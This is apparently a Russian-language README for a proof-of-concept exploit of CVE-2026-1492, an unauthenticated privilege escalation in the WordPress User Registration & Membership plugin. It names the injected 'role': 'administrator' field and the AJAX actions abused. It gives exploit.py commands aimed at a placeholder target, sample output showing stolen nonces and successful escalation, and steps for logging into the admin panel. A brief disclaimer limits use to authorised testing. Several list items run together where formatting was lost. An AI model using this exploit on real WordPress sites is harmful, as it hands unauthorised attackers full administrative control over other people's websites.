
Эксплойт proof-of-concept для CVE-2026-1492 в плагине WordPress User Registration, позволяющий неаутентифицированному злоумышленнику повысить привилегии до администратора через специально сформированную регистрацию участника.
Этот репозиторий содержит proof-of-concept эксплойт для CVE-2026-1492 — критической уязвимости, затрагивающей плагин WordPress User Registration & Membership.
Уязвимость позволяет неаутентифицированным атакующим создавать учётные записи администратора, злоупотребляя процессом регистрации участников.
👉 Полный технический анализ этой уязвимости доступен здесь:
Технический анализ
В нём пошагово объясняется, как бэкенд обрабатывает данные, контролируемые атакующим, и почему повышение привилегий становится возможным.
Плагин ненадлежащим образом доверяет пользовательскому вводу в процессе регистрации участников.
В частности:
roleЭто позволяет атакующим задать:
"role": "administrator"
и получить полный административный доступ.
Успешная эксплуатация позволяет:
Уязвимость срабатывает через многошаговый AJAX-процесс:
user_registration_user_form_submituser_registration_membership_register_memberadministrator)python3 exploit.py -t http://target -ru 'http://target/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] Извлечение токенов...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] Отправка запроса на регистрацию...
[+] Пользователь создан
[*] Отправка запроса на членство...
[+] Повышение привилегий выполнено успешно
Войдите, используя сгенерированные учётные данные:
http://target/wp-login.php
Затем получите доступ к админ-панели:
http://target/wp-admin/
Примечание: путь к админ-панели может быть изменён.
Этот эксплойт предоставлен только в образовательных целях и для авторизованного тестирования безопасности.
Не используйте его против систем без разрешения.